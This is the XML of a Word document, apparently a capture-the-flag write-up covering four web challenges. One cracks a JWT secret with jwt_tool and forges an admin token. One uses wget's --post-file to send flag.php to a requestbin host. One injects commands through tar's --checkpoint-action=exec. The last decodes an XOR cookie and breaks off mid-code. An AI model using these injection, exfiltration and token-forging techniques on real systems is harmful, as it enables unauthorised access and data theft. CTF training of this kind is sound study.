        <w:t xml:space="preserve"> which was saved in the </w:t>
      </w:r>
      <w:r w:rsidR="00F71756">
        <w:t>above-mentioned</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> folder</w:t>
      </w:r>
      <w:r w:rsidR="00F71756">
        <w:t>, We found CTF</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796139CE" w14:textId="519B0F65" w:rsidR="00C63CA4" w:rsidRDefault="00F71756" w:rsidP="00EC304B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r w:rsidRPr="00F71756">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44AA7FB7" wp14:editId="527F1AD0">
            <wp:extent cx="5943600" cy="2847340"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="233" name="Google Shape;233;p17"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3" name="Google Shape;233;p17" descr="Graphical user interface, text&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId30">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2847340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="767122D9" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="0046472A" w:rsidRDefault="00080E3F" w:rsidP="00EC304B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B45258A" w14:textId="3919477D" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00080E3F">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Under-construction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BDF36E" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>First, let’s create an account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303083B3" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A87B136" wp14:editId="32A62A87">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1396682905" name="Picture 139668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2905" name="Picture 1396682905"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0394178" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>Now let’s login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F917176" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BBA4294" wp14:editId="2398F0D3">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9BA7FAD" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>This is what we see after the login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C0F873" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D5B85F3" wp14:editId="7B2E9710">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="105390389" name="Picture 105390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0389" name="Picture 105390389"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10081D23" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>Since, the technology used is vue.js, all javascript script are not readable, but after adding .map to the end of their URL we can see the original source. Application data is most probably stored in local storage and if we look in the screenshot below, we can see that there is a role called ROLE_ADMIN, most probably admin role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22527486" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45662E35" wp14:editId="7C078895">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="74818918" name="Picture 7481891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8918" name="Picture 74818918" descr="A computer screen shot of a computer scree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504D03FB" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>Now we chech /js/app.d875ddd5.js.map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359EA314" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="480FBA75" wp14:editId="1E70FDF0">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="785017229" name="Picture 785017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7229" name="Picture 785017229"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1E30983" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>We can see in the screenshot below that application has users with admin roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF0B8DD" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FCA9516" wp14:editId="49C64FF9">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="762907059" name="Picture 762907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07059" name="Picture 762907059"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36F0BAB2" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>Now, will move on to user page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C371249" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57F6DB59" wp14:editId="3449C1A5">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="876467873" name="Picture 87646787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7873" name="Picture 876467873" descr="A computer screen with a white scree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7C54944" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>We will open dev tools and find out data about our user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6698B23B" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C96A864" wp14:editId="0AC6C8D1">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1921507699" name="Picture 192150769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7699" name="Picture 1921507699" descr="A computer screen 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AFA7D72" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>Since we have id=4 we can assume that admin has id=1. If we put ROLE_ADMIN instead of user, we will notice a new button in the navigation bar. The only parameter passed to this endpoint is JWT token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AB2321" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0712AE28" wp14:editId="72AFD8CB">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="180908500" name="Picture 180908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8500" name="Picture 180908500"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2E6F82FB" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F1CE0A6" wp14:editId="71E338B6">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="310972244" name="Picture 31097224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2244" name="Picture 310972244" descr="A computer screen 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700906F" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>Now we will refresh the page and we see Admin Board:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB19D1C" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35039A59" wp14:editId="66452877">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1019614081" name="Picture 1019614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4081" name="Picture 101961408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7E50A26" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>Now with the help of jwt_tool I write the following code python3 jwt_tool.py -t http://34.159.31.74:31800 /api/app/admin -rc "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MTIsImlhdCI6MTYzNTkzNjY4OCwiZ XhwIjoxNjM2MDIzMDg4fQ.tQ2KlBU8tI5V1Akiqhwy2LSEOF9oBTvnYFs_xgwro04" -C -d ~/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C31884" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>Jwt_tool will tell us that correct key is letmein.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F904916" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>Now that we have secret key, we will go to jwt.io and change id=1 and write the secret key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D508F42" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="062E38CC" wp14:editId="36459C3D">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="19" name="Picture 19" descr="A computer screen with a screen showing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with a screen showing a website&#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694AEA6" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>From then on I will use python code and will get the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FCB75A" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2787977E" wp14:editId="17CB939E">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4A12AF24" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77EADBE0" wp14:editId="08022B85">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49D5E1CD" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>In the screenshot above is the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D445AA1" w14:textId="7914D154" w:rsidR="00080E3F" w:rsidRPr="00BE163A" w:rsidRDefault="00080E3F" w:rsidP="00BE163A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE163A">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Downloader-v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32558E35" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>Let’s inspect the page and we see there is possible flag in flag.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173D582E" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="564C4CA1" wp14:editId="4824A8FC">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2126590854" name="Picture 212659085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0854" name="Picture 2126590854" descr="A computer screen shot of a computer program&#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76C96C8" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>We will use requestbin to find the flag. I will write the url given from the requestbin in the url to download box and will also write –post-file to get the content from a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE147BB" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4173A5FC" wp14:editId="0CB3979B">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="90963916" name="Picture 90963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916" name="Picture 90963916"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5C8998F0" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRPr="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:t>After writing the code above, I will go to requestbin, check the post method and we see the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BD1E62" w14:textId="77777777" w:rsidR="00080E3F" w:rsidRDefault="00080E3F" w:rsidP="00080E3F">
      <w:r w:rsidRPr="00080E3F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60CBCDBA" wp14:editId="05A05029">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16" name="Picture 1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with a message&#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4D59107A" w14:textId="64B5BB3E" w:rsidR="00016208" w:rsidRPr="00016208" w:rsidRDefault="00016208" w:rsidP="00016208">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tartarsausage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1A4176" w14:textId="0D172E54" w:rsidR="00016208" w:rsidRPr="00016208" w:rsidRDefault="00016208" w:rsidP="00016208">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00016208">
        <w:t>First of all, let’s start by inspecting the source code. We see html file and we will try to access it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264E3CB6" w14:textId="77777777" w:rsidR="00016208" w:rsidRPr="00016208" w:rsidRDefault="00016208" w:rsidP="00016208">
      <w:r w:rsidRPr="00016208">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03537DD9" wp14:editId="350F9DF0">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1665590397" name="Picture 1665590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0397" name="Picture 1665590397"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227BDABA" w14:textId="77777777" w:rsidR="00016208" w:rsidRPr="00016208" w:rsidRDefault="00016208" w:rsidP="00016208">
      <w:r w:rsidRPr="00016208">
        <w:t xml:space="preserve">Here we have a little hint about tar function, we should try shell commands. I will use one of the shell commands to access the contents of the website: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0482C56D" w14:textId="77777777" w:rsidR="00016208" w:rsidRPr="00016208" w:rsidRDefault="00016208" w:rsidP="00016208">
      <w:r w:rsidRPr="00016208">
        <w:t>-cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="ls -lah"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC8E63" w14:textId="77777777" w:rsidR="00016208" w:rsidRPr="00016208" w:rsidRDefault="00016208" w:rsidP="00016208">
      <w:r w:rsidRPr="00016208">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="332ACB32" wp14:editId="0BC200D4">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1943066531" name="Picture 1943066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66531" name="Picture 194306653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534F30C0" w14:textId="77777777" w:rsidR="00016208" w:rsidRPr="00016208" w:rsidRDefault="00016208" w:rsidP="00016208">
      <w:r w:rsidRPr="00016208">
        <w:t>In the next screenshot we see the content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200E05DA" w14:textId="77777777" w:rsidR="00016208" w:rsidRPr="00016208" w:rsidRDefault="00016208" w:rsidP="00016208">
      <w:r w:rsidRPr="00016208">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CA67951" wp14:editId="0988EA07">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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55033657" w14:textId="77777777" w:rsidR="00016208" w:rsidRPr="00016208" w:rsidRDefault="00016208" w:rsidP="00016208">
      <w:r w:rsidRPr="00016208">
        <w:t>I will guess that flag is hidden in enhjenhzZGN3YWRzYWRhc2Rhc3NhY2FzY2FzY2FzY2FjYWNzZHNhY2FzY2Fzc2FjY2Fz folder and will enter new shell command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77487FA5" w14:textId="77777777" w:rsidR="00016208" w:rsidRPr="00016208" w:rsidRDefault="00016208" w:rsidP="00016208">
      <w:r w:rsidRPr="00016208">
        <w:t>cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec="cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3355C731" w14:textId="77777777" w:rsidR="00016208" w:rsidRPr="00016208" w:rsidRDefault="00016208" w:rsidP="00016208">
      <w:r w:rsidRPr="00016208">
        <w:t>enhjenhzZGN3YWRzYWRhc2Rhc3NhY2FzY2FzY2FzY2FjYWNzZHNhY2FzY2Fzc2FjY2Fz/flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC76C27" w14:textId="77777777" w:rsidR="00016208" w:rsidRPr="00016208" w:rsidRDefault="00016208" w:rsidP="00016208">
      <w:r w:rsidRPr="00016208">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6486BA99" wp14:editId="1FB1784B">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1344966332" name="Picture 13449663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6332" name="Picture 1344966332" descr="A screen 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098D0DB5" w14:textId="77777777" w:rsidR="00016208" w:rsidRPr="00016208" w:rsidRDefault="00016208" w:rsidP="00016208">
      <w:r w:rsidRPr="00016208">
        <w:lastRenderedPageBreak/>
        <w:t>As we see in the screenshot above, it worked and I got the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048A36CB" w14:textId="3FBE08E7" w:rsidR="00016208" w:rsidRPr="0025739D" w:rsidRDefault="0025739D" w:rsidP="0025739D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Alfa-cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585C3991" w14:textId="31B0B66B" w:rsidR="0025739D" w:rsidRPr="00A16612" w:rsidRDefault="00F62999" w:rsidP="00A16612">
      <w:pPr>
        <w:ind w:left="45"/>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16612">
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>The exercise page contains a link to a site that has a dashboard that we can't access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ED87B3" w14:textId="477B1B52" w:rsidR="00F62999" w:rsidRDefault="00A16612" w:rsidP="00A16612">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16612">
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58D3FCF8" wp14:editId="579C8A50">
            <wp:extent cx="5611008" cy="2200582"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="81360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9264" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5611008" cy="2200582"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2971EAEA" w14:textId="2C2313CE" w:rsidR="00A16612" w:rsidRPr="00A16612" w:rsidRDefault="00A16612" w:rsidP="00A16612">
      <w:r>
        <w:t xml:space="preserve">We use burp suite and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A16612">
        <w:t>notice that the site sets two cookies when accessed</w:t>
      </w:r>
      <w:r>
        <w:t>, auth_cookie and key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F992233" w14:textId="299ABD6B" w:rsidR="00BE163A" w:rsidRDefault="00A16612" w:rsidP="00080E3F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30618844" wp14:editId="5CA5630A">
            <wp:extent cx="5943600" cy="3574415"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1976135240" name="Picture 1976135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240" name="Picture 1976135240" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3574415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5CB3BC" w14:textId="1438D9DC" w:rsidR="00705768" w:rsidRDefault="00705768" w:rsidP="00080E3F">
      <w:r>
        <w:t>Then we open cmd and write:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D7CD98" w14:textId="5600A42A" w:rsidR="00705768" w:rsidRDefault="00705768" w:rsidP="00080E3F">
      <w:r>
        <w:t>Python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268A6990" w14:textId="55519B51" w:rsidR="00705768" w:rsidRDefault="00705768" w:rsidP="00080E3F">
      <w:r>
        <w:t>from pwn import xor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFDEA13" w14:textId="739FFA0C" w:rsidR="00705768" w:rsidRDefault="00705768" w:rsidP="00080E3F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>bytes.fromhex(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">აქ ვწერთ რაც წერია </w:t>
      </w:r>
      <w:r>
        <w:t>auth cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ში ჩასმული ბრჭყალებში’ ‘)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E9EF3D" w14:textId="3316CAB8" w:rsidR="00705768" w:rsidRDefault="00705768" w:rsidP="00080E3F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>key = ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">აქ ვწერთ </w:t>
      </w:r>
